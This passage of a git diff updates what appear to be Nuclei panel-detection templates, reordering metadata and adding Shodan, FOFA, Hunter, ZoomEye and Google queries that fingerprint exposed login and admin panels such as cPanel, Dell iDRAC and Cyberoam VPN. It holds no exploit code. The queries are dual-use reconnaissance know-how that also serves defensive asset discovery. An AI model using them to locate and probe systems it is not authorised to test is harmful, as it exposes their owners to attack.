748def1c77..f4a62d7ed8 100644 --- a/http/exposed-panels/connectwise-backup-manager.yaml +++ b/http/exposed-panels/connectwise-backup-manager.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.component:zk http.title:"Server Backup Manager" - verified: true tags: panel,connectwise,backup http: diff --git a/http/exposed-panels/connectwise-panel.yaml b/http/exposed-panels/connectwise-panel.yaml index 75feb4ba0f..ddce3e539e 100644 --- a/http/exposed-panels/connectwise-panel.yaml +++ b/http/exposed-panels/connectwise-panel.yaml @@ -9,11 +9,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:connectwise:screenconnect:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: connectwise product: screenconnect shodan-query: http.favicon.hash:-82958153 - vendor: connectwise - verified: true + fofa-query: + - app="screenconnect-remote-support-software" + - icon_hash=-82958153 + hunter-query: app.name="connectwise screenconnect software" + zoomeye-query: app:"screenconnect remote management software" tags: screenconnect,panel,connectwise,detect http: diff --git a/http/exposed-panels/contao-login-panel.yaml b/http/exposed-panels/contao-login-panel.yaml index 5a7d1ef6d3..d4bdf0992a 100644 --- a/http/exposed-panels/contao-login-panel.yaml +++ b/http/exposed-panels/contao-login-panel.yaml @@ -10,11 +10,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: contao - shodan-query: http.html:"Contao Open Source CMS" - vendor: contao verified: true + max-request: 1 + vendor: contao + product: contao + shodan-query: + - http.html:"Contao Open Source CMS" + - http.title:"contao" + - http.html:"contao open source cms" + - cpe:"cpe:2.3:a:contao:contao" + fofa-query: + - title="contao" + - body="contao open source cms" + google-query: intitle:"contao" tags: panel,contao http: diff --git a/http/exposed-panels/content-central-login.yaml b/http/exposed-panels/content-central-login.yaml index 4d85515401..97f57e01af 100644 --- a/http/exposed-panels/content-central-login.yaml +++ b/http/exposed-panels/content-central-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"Content Central Login" - verified: true tags: panel,content-central http: diff --git a/http/exposed-panels/corebos-panel.yaml b/http/exposed-panels/corebos-panel.yaml index 7f18a54ba0..0618a9da35 100644 --- a/http/exposed-panels/corebos-panel.yaml +++ b/http/exposed-panels/corebos-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:corebos:corebos:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: corebos product: corebos shodan-query: http.html:"corebos" - vendor: corebos - verified: true + fofa-query: body="corebos" tags: panel,corebos http: diff --git a/http/exposed-panels/cortex-xsoar-login.yaml b/http/exposed-panels/cortex-xsoar-login.yaml index e4d8cb7caf..5cce94feaf 100644 --- a/http/exposed-panels/cortex-xsoar-login.yaml +++ b/http/exposed-panels/cortex-xsoar-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:paloaltonetworks:cortex_xsoar:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: cortex_xsoar - shodan-query: http.title:"Cortex XSOAR" vendor: paloaltonetworks + product: cortex_xsoar + shodan-query: + - http.title:"Cortex XSOAR" + - http.title:"cortex xsoar" + fofa-query: title="cortex xsoar" + google-query: intitle:"cortex xsoar" tags: panel,soar,login,paloaltonetworks http: diff --git a/http/exposed-panels/couchdb-exposure.yaml b/http/exposed-panels/couchdb-exposure.yaml index 48dd5fd207..145b7e32bb 100644 --- a/http/exposed-panels/couchdb-exposure.yaml +++ b/http/exposed-panels/couchdb-exposure.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: couchdb vendor: apache + product: couchdb + shodan-query: + - product:"couchdb" + - cpe:"cpe:2.3:a:apache:couchdb" tags: panel,couchdb,apache http: diff --git a/http/exposed-panels/couchdb-fauxton.yaml b/http/exposed-panels/couchdb-fauxton.yaml index e4288cd1d3..d31a9d556c 100644 --- a/http/exposed-panels/couchdb-fauxton.yaml +++ b/http/exposed-panels/couchdb-fauxton.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: couchdb vendor: apache + product: couchdb + shodan-query: + - product:"couchdb" + - cpe:"cpe:2.3:a:apache:couchdb" tags: panel,apache,couchdb http: diff --git a/http/exposed-panels/cpanel-api-codes.yaml b/http/exposed-panels/cpanel-api-codes.yaml index 1cd654880a..53f2ce9e01 100644 --- a/http/exposed-panels/cpanel-api-codes.yaml +++ b/http/exposed-panels/cpanel-api-codes.yaml @@ -10,11 +10,21 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: cpanel - shodan-query: title:"CPanel - API Codes" - vendor: cpanel verified: true + max-request: 1 + vendor: cpanel + product: cpanel + shodan-query: + - title:"CPanel - API Codes" + - http.title:"cpanel" + - cpe:"cpe:2.3:a:cpanel:cpanel" + - http.title:"cpanel - api codes" + fofa-query: + - title="cpanel - api codes" + - title="cpanel" + google-query: + - intitle:"cpanel - api codes" + - intitle:"cpanel" tags: panel,cpanel http: diff --git a/http/exposed-panels/craftcms-admin-panel.yaml b/http/exposed-panels/craftcms-admin-panel.yaml index 1c26ff0ad2..cb538d70e7 100644 --- a/http/exposed-panels/craftcms-admin-panel.yaml +++ b/http/exposed-panels/craftcms-admin-panel.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:craft_cms:*:*:* metadata: max-request: 1 - product: seomatic - shodan-query: 'X-Powered-By: Craft CMS' vendor: nystudio107 + product: seomatic + shodan-query: + - 'X-Powered-By: Craft CMS' + - "x-powered-by: craft cms" + - 'x-powered-by: craft cms html:"seomatic"' tags: panel,craftcms,nystudio107 http: diff --git a/http/exposed-panels/craftercms-panel.yaml b/http/exposed-panels/craftercms-panel.yaml index 637e9b1bbe..aa0826bea7 100644 --- a/http/exposed-panels/craftercms-panel.yaml +++ b/http/exposed-panels/craftercms-panel.yaml @@ -1,19 +1,19 @@ id: craftercms-panel -info: - name: CrafterCMS Login Panel - Detect - author: righettod - severity: info - description: | - CrafterCMS login panel was detected. - reference: - - https://craftercms.org/ - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"craftercms" - tags: panel,craftercms,login,detect - +info: + name: CrafterCMS Login Panel - Detect + author: righettod + severity: info + description: | + CrafterCMS login panel was detected. + reference: + - https://craftercms.org/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"craftercms" + tags: panel,craftercms,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/creatio-login-panel.yaml b/http/exposed-panels/creatio-login-panel.yaml index 26694cc128..b5a4558643 100644 --- a/http/exposed-panels/creatio-login-panel.yaml +++ b/http/exposed-panels/creatio-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Creatio" - verified: true tags: panel,creatio http: diff --git a/http/exposed-panels/crontab-ui.yaml b/http/exposed-panels/crontab-ui.yaml index c03e31f35c..9cdc773ed3 100644 --- a/http/exposed-panels/crontab-ui.yaml +++ b/http/exposed-panels/crontab-ui.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=629288492575007&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: html:"Crontab UI" - verified: true tags: exposure,crontab,ui,panel http: diff --git a/http/exposed-panels/crush-ftp-login.yaml b/http/exposed-panels/crush-ftp-login.yaml index 8b6ac82e14..19a6094459 100644 --- a/http/exposed-panels/crush-ftp-login.yaml +++ b/http/exposed-panels/crush-ftp-login.yaml @@ -12,10 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: crushftp - vendor: crushftp verified: true + max-request: 1 + vendor: crushftp + product: crushftp + shodan-query: http.html:"crushftp" + fofa-query: body="crushftp" tags: panel,edb,crushftp,detect http: diff --git a/http/exposed-panels/cryptobox-panel.yaml b/http/exposed-panels/cryptobox-panel.yaml index b3670ef6da..7b4257d51a 100644 --- a/http/exposed-panels/cryptobox-panel.yaml +++ b/http/exposed-panels/cryptobox-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.ercom.com/solutions/cryptobox-presentation metadata: + verified: true max-request: 1 shodan-query: title:"Cryptobox" - verified: true tags: panel,cryptobox,login,detect http: diff --git a/http/exposed-panels/cudatel-panel.yaml b/http/exposed-panels/cudatel-panel.yaml index 5ec722251d..3cd0d80735 100644 --- a/http/exposed-panels/cudatel-panel.yaml +++ b/http/exposed-panels/cudatel-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"CudaTel" - verified: true tags: panel,cudatel http: diff --git a/http/exposed-panels/cvent-panel-detect.yaml b/http/exposed-panels/cvent-panel-detect.yaml index 835c0d561c..d2a6a7f654 100644 --- a/http/exposed-panels/cvent-panel-detect.yaml +++ b/http/exposed-panels/cvent-panel-detect.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 5 shodan-query: http.html:"Cvent Inc" - verified: true tags: panel,cvent http: diff --git a/http/exposed-panels/cwp-webpanel.yaml b/http/exposed-panels/cwp-webpanel.yaml index 1373e8751b..fd8b0f9149 100644 --- a/http/exposed-panels/cwp-webpanel.yaml +++ b/http/exposed-panels/cwp-webpanel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title=="CWP |用户" || title=="Login | CentOS WebPanel" || body="CentOS WebPanel" max-request: 1 + fofa-query: title=="CWP |用户" || title=="Login | CentOS WebPanel" || body="CentOS WebPanel" tags: panel,centos http: diff --git a/http/exposed-panels/cyberchef-panel.yaml b/http/exposed-panels/cyberchef-panel.yaml index 16f35d626d..aa6389568e 100644 --- a/http/exposed-panels/cyberchef-panel.yaml +++ b/http/exposed-panels/cyberchef-panel.yaml @@ -1,19 +1,19 @@ id: cyberchef-panel -info: - name: Cyber Chef Panel - Detect - author: rxerium - severity: info - description: | - A Cyber Chef Panel was detected - reference: - - https://cyberchef.org - metadata: - verified: true - max-request: 1 - shodan-query: title:"CyberChef" - tags: panel,cyberchef,login,detect - +info: + name: Cyber Chef Panel - Detect + author: rxerium + severity: info + description: | + A Cyber Chef Panel was detected + reference: + - https://cyberchef.org + metadata: + verified: true + max-request: 1 + shodan-query: title:"CyberChef" + tags: panel,cyberchef,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml b/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml index d96f34f7b9..4876330e44 100644 --- a/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml +++ b/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml @@ -12,11 +12,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:sophos:cyberoam:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"Cyberoam SSL VPN Portal" max-request: 1 - product: cyberoam - shodan-query: title:"Cyberoam SSL VPN Portal" vendor: sophos + product: cyberoam + shodan-query: + - title:"Cyberoam SSL VPN Portal" + - http.title:"cyberoam ssl vpn portal" + google-query: + - intitle:"Cyberoam SSL VPN Portal" + - intitle:"cyberoam ssl vpn portal" + fofa-query: title="cyberoam ssl vpn portal" tags: panel,cyberoam,vpn,sophos http: diff --git a/http/exposed-panels/dahua-web-panel.yaml b/http/exposed-panels/dahua-web-panel.yaml index b669d439bc..108d0a6397 100644 --- a/http/exposed-panels/dahua-web-panel.yaml +++ b/http/exposed-panels/dahua-web-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1653394551 - verified: true tags: edb,panel,dahua,detect http: diff --git a/http/exposed-panels/darktrace-threat-visualizer.yaml b/http/exposed-panels/darktrace-threat-visualizer.yaml index 84ddc7d128..d221e57784 100644 --- a/http/exposed-panels/darktrace-threat-visualizer.yaml +++ b/http/exposed-panels/darktrace-threat-visualizer.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:darktrace:threat_visualizer:*:*:*:*:android:*:*:* metadata: - max-request: 1 - product: threat_visualizer - shodan-query: html:"Darktrace Threat Visualizer" - vendor: darktrace verified: true + max-request: 1 + vendor: darktrace + product: threat_visualizer + shodan-query: + - html:"Darktrace Threat Visualizer" + - http.html:"darktrace threat visualizer" + fofa-query: body="darktrace threat visualizer" tags: panel,darktrace http: diff --git a/http/exposed-panels/dashy-panel.yaml b/http/exposed-panels/dashy-panel.yaml index 6c8b6850c3..5ff95c512e 100644 --- a/http/exposed-panels/dashy-panel.yaml +++ b/http/exposed-panels/dashy-panel.yaml @@ -9,11 +9,12 @@ info: classification: cpe: cpe:2.3:a:dashy:dashy:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: dashy product: dashy shodan-query: http.favicon.hash:-1013024216 - vendor: dashy - verified: true + fofa-query: icon_hash=-1013024216 tags: panel,dashy,detect http: diff --git a/http/exposed-panels/datadog-login.yaml b/http/exposed-panels/datadog-login.yaml index 4aded9b958..4994e02c84 100644 --- a/http/exposed-panels/datadog-login.yaml +++ b/http/exposed-panels/datadog-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Datadog" - verified: true tags: panel,datadog http: diff --git a/http/exposed-panels/dataease-panel.yaml b/http/exposed-panels/dataease-panel.yaml index 2f077d329d..9f3a62b7d7 100644 --- a/http/exposed-panels/dataease-panel.yaml +++ b/http/exposed-panels/dataease-panel.yaml @@ -11,11 +11,14 @@ info: classification: cpe: cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: dataease - shodan-query: html:"Dataease" - vendor: dataease verified: true + max-request: 1 + vendor: dataease + product: dataease + shodan-query: + - html:"Dataease" + - http.html:"dataease" + fofa-query: body="dataease" tags: login,panel,dataease http: diff --git a/http/exposed-panels/dataiku-panel.yaml b/http/exposed-panels/dataiku-panel.yaml index 0da072a99d..42ae78c90a 100644 --- a/http/exposed-panels/dataiku-panel.yaml +++ b/http/exposed-panels/dataiku-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"dataiku" - verified: true tags: panel,dataiku http: diff --git a/http/exposed-panels/davantis-panel.yaml b/http/exposed-panels/davantis-panel.yaml index 6b2fa8b95e..07007b967b 100644 --- a/http/exposed-panels/davantis-panel.yaml +++ b/http/exposed-panels/davantis-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Davantis" - verified: true tags: panel,davantis http: diff --git a/http/exposed-panels/daybyday-panel.yaml b/http/exposed-panels/daybyday-panel.yaml index 1dcf171ee4..fee27d8a81 100644 --- a/http/exposed-panels/daybyday-panel.yaml +++ b/http/exposed-panels/daybyday-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:daybydaycrm:daybyday:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: daybyday - shodan-query: http.title:"Daybyday" vendor: daybydaycrm + product: daybyday + shodan-query: + - http.title:"Daybyday" + - http.title:"daybyday" + fofa-query: title="daybyday" + google-query: intitle:"daybyday" tags: panel,daybyday,daybydaycrm http: diff --git a/http/exposed-panels/dell-bmc-panel-detect.yaml b/http/exposed-panels/dell-bmc-panel-detect.yaml index b50e9c7850..7c556f2798 100644 --- a/http/exposed-panels/dell-bmc-panel-detect.yaml +++ b/http/exposed-panels/dell-bmc-panel-detect.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Dell Remote Management Controller" - verified: true tags: panel,bmc,dell,login http: diff --git a/http/exposed-panels/dell-idrac.yaml b/http/exposed-panels/dell-idrac.yaml index 5de5884a50..d7a4fc65c9 100644 --- a/http/exposed-panels/dell-idrac.yaml +++ b/http/exposed-panels/dell-idrac.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"thisIDRACText" - verified: true tags: panel,idrac,dell,detect http: diff --git a/http/exposed-panels/dell-wyse-login.yaml b/http/exposed-panels/dell-wyse-login.yaml index 61562d6654..734aa03be1 100644 --- a/http/exposed-panels/dell-wyse-login.yaml +++ b/http/exposed-panels/dell-wyse-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:dell:wyse_management_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: wyse_management_suite vendor: dell + product: wyse_management_suite tags: panel,dell,login http: diff --git a/http/exposed-panels/deluge-webui-panel.yaml b/http/exposed-panels/deluge-webui-panel.yaml index 9de52a2976..37e65d3ce7 100644 --- a/http/exposed-panels/deluge-webui-panel.yaml +++ b/http/exposed-panels/deluge-webui-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:deluge-torrent:deluge:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: deluge - shodan-query: title:"Deluge WebUI" - vendor: deluge-torrent verified: true + max-request: 1 + vendor: deluge-torrent + product: deluge + shodan-query: + - title:"Deluge WebUI" + - http.title:"deluge webui" + fofa-query: title="deluge webui" + google-query: intitle:"deluge webui" tags: panel,deluge,deluge-torrent http: diff --git a/http/exposed-panels/digital-watchdog-panel.yaml b/http/exposed-panels/digital-watchdog-panel.yaml index 7818badec2..655fafc9e4 100644 --- a/http/exposed-panels/digital-watchdog-panel.yaml +++ b/http/exposed-panels/digital-watchdog-panel.yaml @@ -7,10 +7,10 @@ info: description: | Digital Watchdog panel was detected. metadata: - max-request: 1 verified: true - fofa-query: icon_hash="868509217" - shodan-query: http.favicon.hash:868509217 + max-request: 2 + shodan-query: "http.favicon.hash:868509217" + fofa-query: "icon_hash=\"868509217\"" tags: digital-watchdog,panel,detect,login,dw,spectrum http: diff --git a/http/exposed-panels/digitalrebar-login.yaml b/http/exposed-panels/digitalrebar-login.yaml index 6243172669..831d6eb3f1 100644 --- a/http/exposed-panels/digitalrebar-login.yaml +++ b/http/exposed-panels/digitalrebar-login.yaml @@ -14,8 +14,8 @@ info: cpe: cpe:2.3:a:rackn:digital_rebar:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: digital_rebar vendor: rackn + product: digital_rebar tags: rackn,digitalrebar,panel http: diff --git a/http/exposed-panels/directadmin-login-panel.yaml b/http/exposed-panels/directadmin-login-panel.yaml index e6c6ae6b56..02afd5df9a 100644 --- a/http/exposed-panels/directadmin-login-panel.yaml +++ b/http/exposed-panels/directadmin-login-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:directadmin:directadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: directadmin - shodan-query: title:"DirectAdmin Login" vendor: directadmin + product: directadmin + shodan-query: + - title:"DirectAdmin Login" + - http.title:"directadmin login" + fofa-query: title="directadmin login" + google-query: intitle:"directadmin login" tags: panel,directadmin http: diff --git a/http/exposed-panels/directum-login.yaml b/http/exposed-panels/directum-login.yaml index 5768af5e60..364fb1b5e2 100644 --- a/http/exposed-panels/directum-login.yaml +++ b/http/exposed-panels/directum-login.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="Directum" max-request: 1 + fofa-query: title="Directum" tags: directum,panel http: diff --git a/http/exposed-panels/discuz-panel.yaml b/http/exposed-panels/discuz-panel.yaml index 72429237ba..30af114ecb 100644 --- a/http/exposed-panels/discuz-panel.yaml +++ b/http/exposed-panels/discuz-panel.yaml @@ -5,10 +5,10 @@ info: author: ritikchaddha severity: info metadata: - fofa-query: title="Discuz!" + verified: true max-request: 1 shodan-query: title:"Discuz!" - verified: true + fofa-query: title="Discuz!" tags: panel,discuz,detect,login http: diff --git a/http/exposed-panels/django-admin-panel.yaml b/http/exposed-panels/django-admin-panel.yaml index 3d18400e9f..a3abacfa8c 100644 --- a/http/exposed-panels/django-admin-panel.yaml +++ b/http/exposed-panels/django-admin-panel.yaml @@ -11,8 +11,9 @@ info: cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: django vendor: djangoproject + product: django + shodan-query: cpe:"cpe:2.3:a:djangoproject:django" tags: panel,django,python,djangoproject http: diff --git a/http/exposed-panels/docebo-elearning-panel.yaml b/http/exposed-panels/docebo-elearning-panel.yaml index 5454ee7885..7f36d42c2f 100644 --- a/http/exposed-panels/docebo-elearning-panel.yaml +++ b/http/exposed-panels/docebo-elearning-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="Docebo E-learning" - max-request: 1 verified: true + max-request: 1 + fofa-query: title="Docebo E-learning" tags: panel,docebo http: diff --git a/http/exposed-panels/dockge-panel.yaml b/http/exposed-panels/dockge-panel.yaml index 7b2c54506c..0fe258c1f2 100644 --- a/http/exposed-panels/dockge-panel.yaml +++ b/http/exposed-panels/dockge-panel.yaml @@ -10,10 +10,11 @@ info: - https://github.com/louislam/dockge - https://dockge.kuma.pet/ metadata: + verified: true max-request: 1 shodan-query: title:"Dockge" - verified: true tags: panel,dockge,login + http: - method: GET path: diff --git a/http/exposed-panels/dokuwiki-panel.yaml b/http/exposed-panels/dokuwiki-panel.yaml index 67610dfb38..941ed1211e 100644 --- a/http/exposed-panels/dokuwiki-panel.yaml +++ b/http/exposed-panels/dokuwiki-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.dokuwiki.org/dokuwiki metadata: + verified: true max-request: 1 shodan-query: http.html:"/dokuwiki/" - verified: true tags: panel,dokuwiki,login http: diff --git a/http/exposed-panels/doris-panel.yaml b/http/exposed-panels/doris-panel.yaml index 0d8470894c..29e2840aa9 100644 --- a/http/exposed-panels/doris-panel.yaml +++ b/http/exposed-panels/doris-panel.yaml @@ -6,9 +6,9 @@ info: severity: info description: Doris panel detection template. metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:24048806 - verified: true tags: doris,panel,login,detect http: diff --git a/http/exposed-panels/dotclear-panel.yaml b/http/exposed-panels/dotclear-panel.yaml index 587c582458..0acbb5011d 100644 --- a/http/exposed-panels/dotclear-panel.yaml +++ b/http/exposed-panels/dotclear-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:dotclear:dotclear:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: dotclear - shodan-query: http.title:"Dotclear" vendor: dotclear + product: dotclear + shodan-query: + - http.title:"Dotclear" + - http.title:"dotclear" + fofa-query: title="dotclear" + google-query: intitle:"dotclear" tags: panel,dotclear http: diff --git a/http/exposed-panels/dotcms-admin-panel.yaml b/http/exposed-panels/dotcms-admin-panel.yaml index 5a42ed97af..6551823659 100644 --- a/http/exposed-panels/dotcms-admin-panel.yaml +++ b/http/exposed-panels/dotcms-admin-panel.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: dotcms vendor: dotcms + product: dotcms + shodan-query: http.title:"dotcms" + fofa-query: title="dotcms" + google-query: intitle:"dotcms" tags: panel,dotcms,cms http: diff --git a/http/exposed-panels/dplus-dashboard.yaml b/http/exposed-panels/dplus-dashboard.yaml index 132729ee36..d9097baf8c 100644 --- a/http/exposed-panels/dplus-dashboard.yaml +++ b/http/exposed-panels/dplus-dashboard.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"DPLUS Dashboard" - verified: true tags: panel,dplus,exposure http: diff --git a/http/exposed-panels/dqs-superadmin-panel.yaml b/http/exposed-panels/dqs-superadmin-panel.yaml index 74f5cf2875..3bd88835ba 100644 --- a/http/exposed-panels/dqs-superadmin-panel.yaml +++ b/http/exposed-panels/dqs-superadmin-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"DQS Superadmin" - verified: true tags: panel,dqs,superadmin http: diff --git a/http/exposed-panels/dradis-pro-panel.yaml b/http/exposed-panels/dradis-pro-panel.yaml index 9ec2e9828b..248031199c 100644 --- a/http/exposed-panels/dradis-pro-panel.yaml +++ b/http/exposed-panels/dradis-pro-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Dradis Professional Edition" - verified: true tags: panel,dradis http: diff --git a/http/exposed-panels/drawio-flowchartmaker-panel.yaml b/http/exposed-panels/drawio-flowchartmaker-panel.yaml index a0826f7469..c134a3ce4a 100644 --- a/http/exposed-panels/drawio-flowchartmaker-panel.yaml +++ b/http/exposed-panels/drawio-flowchartmaker-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: drawio - shodan-query: http.title:"Flowchart Maker" - vendor: diagrams verified: true + max-request: 1 + vendor: diagrams + product: drawio + shodan-query: + - http.title:"Flowchart Maker" + - http.title:"flowchart maker" + fofa-query: title="flowchart maker" + google-query: intitle:"flowchart maker" tags: panel,drawio,oss,diagrams http: diff --git a/http/exposed-panels/druid-console-exposure.yaml b/http/exposed-panels/druid-console-exposure.yaml index 4ba687a5c0..4944c7aa81 100644 --- a/http/exposed-panels/druid-console-exposure.yaml +++ b/http/exposed-panels/druid-console-exposure.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:alibaba:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: druid vendor: alibaba + product: druid tags: panel,alibaba,druid http: diff --git a/http/exposed-panels/druid-panel.yaml b/http/exposed-panels/druid-panel.yaml index 4ccebd1fca..7a90ead3e4 100644 --- a/http/exposed-panels/druid-panel.yaml +++ b/http/exposed-panels/druid-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: druid vendor: apache + product: druid tags: panel,druid,apache http: diff --git a/http/exposed-panels/drupal-login.yaml b/http/exposed-panels/drupal-login.yaml index 265533e4a6..eaf5291efe 100644 --- a/http/exposed-panels/drupal-login.yaml +++ b/http/exposed-panels/drupal-login.yaml @@ -11,9 +11,11 @@ info: cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: drupal - shodan-query: http.component:"drupal" vendor: drupal + product: drupal + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" tags: panel,drupal http: diff --git a/http/exposed-panels/dxplanning-panel.yaml b/http/exposed-panels/dxplanning-panel.yaml index aaf6781ecb..7caaad0caa 100644 --- a/http/exposed-panels/dxplanning-panel.yaml +++ b/http/exposed-panels/dxplanning-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.dedalus.com/fr/wp-content/uploads/sites/13/2022/05/Catalogue-formations-DxCare-2022.pdf metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,dxplanning,login,detect http: diff --git a/http/exposed-panels/dynatrace-panel.yaml b/http/exposed-panels/dynatrace-panel.yaml index f22700791f..1727044122 100644 --- a/http/exposed-panels/dynatrace-panel.yaml +++ b/http/exposed-panels/dynatrace-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1828614783 - verified: true tags: dynatrace,login,panel http: diff --git a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml index 78fd8a55e3..966964e4a8 100644 --- 